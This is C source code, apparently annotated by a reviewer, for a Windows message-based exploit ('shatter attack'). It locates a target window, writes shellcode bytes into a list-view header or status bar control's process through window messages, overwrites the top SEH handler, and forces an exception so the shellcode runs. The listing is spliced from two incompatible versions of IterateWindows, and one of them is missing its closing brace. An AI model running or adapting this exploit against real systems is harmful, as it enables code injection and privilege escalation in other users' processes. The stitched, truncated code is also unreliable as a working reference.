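/*
 * Entry point.
 *
 * Optional single argument: the base heap address to use, as a hex string;
 * it is parsed into the global heapaddr (the compiled-in default is kept when
 * no argument is given). The program then looks up the top-level window whose
 * title is the global tWindow, stores its handle in the global mainhWnd and
 * hands it to IterateWindows(), which walks the child windows and does the
 * actual work.
 *
 * Returns 0 when IterateWindows() comes back, 1 when the argument is not a
 * valid hex number or the window could not be found (the original returned 0
 * in the not-found case, which hid the failure from any calling script).
 *
 * Globals: heapaddr (written), tWindow (read), mainhWnd (written).
 */
int main(int argc, char *argv[])
{
   printf("%% Playing with status bar messages\n");
   printf("%% [email protected]\n\n");

   /* argv[1] is untrusted input: check that the parse succeeded instead of
    * silently keeping the default on garbage. Assumes heapaddr is declared
    * as a (unsigned) long so that %lx matches -- confirm against its
    * definition, which is outside this listing. */
   if (argc == 2)
   {
      if (sscanf(argv[1], "%lx", &heapaddr) != 1)
      {
         printf("+ Bad heap address '%s' (expected a hex value)\n", argv[1]);
         return 1;
      }
   }

   printf("%% Using base heap address...0x%xh\n",heapaddr);
   printf("+ Finding %s Window...\n",tWindow);

   /* No class name is given, so presumably only the window title tWindow is
    * matched. The handle is kept as a long in the global mainhWnd, hence the
    * comparison against 0 rather than NULL. */
   mainhWnd = (long)FindWindow(NULL,tWindow);
   if (mainhWnd == 0)
   {
      printf("+ Couldn't Find %s Window\n",tWindow);
      return 1;
   }
   printf("+ Found Main Window At......0x%xh\n",mainhWnd);

   IterateWindows(mainhWnd);
   printf("+ Done...\n");

   return 0;
}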
/*
 * Depth-first walk of every window below hWnd, looking for a list-view
 * control that has a header. Each window visited is sent LVM_GETHEADER; the
 * first one that answers with a non-zero handle becomes the target: the bytes
 * of the global `exploit` array are written one at a time starting at
 * shellcodeaddr, the four bytes of shellcodeaddr are then written
 * (little-endian) over the top SEH record at sehHandler, and HDM_GETITEMRECT
 * is sent to the header so the control faults and the overwritten handler
 * runs. The process exits right after sending that message.
 *
 * Globals written: hLVControl, hHdrControl. Globals read: exploit,
 * shellcodeaddr, sehHandler. doWrite() is defined outside this listing and
 * its result, if it has one, is never checked here; presumably it writes one
 * byte into the target process through a window message. Note that the other
 * IterateWindows() further down this listing passes the HWND to doWrite() as
 * an extra first argument, so the two versions expect different doWrite()
 * signatures -- they are not interchangeable.
 *
 * NOTE(review): this listing is truncated -- the closing brace of the
 * function is missing after the if block below.
 */
void IterateWindows(long hWnd)
{
   long childhWnd,looper;
   // Descend into the first child, then walk its siblings. GetNextWindow
   // returns an HWND; it is stored in a long here without a cast (the other
   // version of this function casts explicitly).
   childhWnd = GetNextWindow(hWnd,GW_CHILD);
   while (childhWnd != NULL)
   {
      IterateWindows(childhWnd);
      childhWnd = GetNextWindow(childhWnd ,GW_HWNDNEXT);
   }
   hLVControl = hWnd;
   // NOTE(review): any window that replies non-zero to LVM_GETHEADER is
   // treated as a list view with a header; a control that interprets the same
   // message number differently could give a false positive -- confirm.
   hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0);
   if(hHdrControl != NULL)
   {
      // Found a Listview Window with a Header
      printf("+ Found listview window..0x%xh\n",hLVControl);
      printf("+ Found lvheader window..0x%xh\n",hHdrControl);
      // Inject shellcode to known address
      printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr);
      // NOTE(review): if exploit is a plain char array, bytes >= 0x80
      // sign-extend through the (long) cast; the SEH writes below mask with
      // & 0xff, so doWrite is presumably expected to use only the low byte --
      // verify against its definition.
      for (looper=0;looper<sizeof(exploit);looper++)
         doWrite((long) exploit[looper],(shellcodeaddr + looper));
      // Overwrite SEH
      printf("+ Overwriting Top SEH....0x%xh\n",sehHandler);
      // Little-endian: least significant byte first, one byte per write.
      doWrite(((shellcodeaddr) & 0xff),sehHandler);
      doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1);
      doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2);
      doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3);
      // Cause exception
      printf("+ Forcing Unhandled Exception\n");
      // lParam 1 is presumably not a valid pointer in the target, so handling
      // the message faults and the SEH chain (now pointing at shellcodeaddr)
      // is invoked. The exact fault path is inside the target, not here.
      SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1);
      printf("+ Done...\n");
      // Exits from inside the recursion; no caller frame is returned to.
      exit(0);
   }
void IterateWindows(long hWnd)
{
   
	long childhWnd,looper;

	childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
	while (childhWnd != NULL)
	{
		IterateWindows(childhWnd);
		childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
	}

	GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
	if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
	{

		// Find Heap Address
		BruteForceHeap((HWND) hWnd);

		// Inject shellcode to known address
		printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
		for (looper=0;looper<sizeof(exploit);looper++)
		 doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
		// Overwrite SEH
		printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);

		doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
		// Cause exception
		printf("+ Forcing Unhandled Exception\n");
		SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
		printf("+ Done...\n");
		exit(0);
	}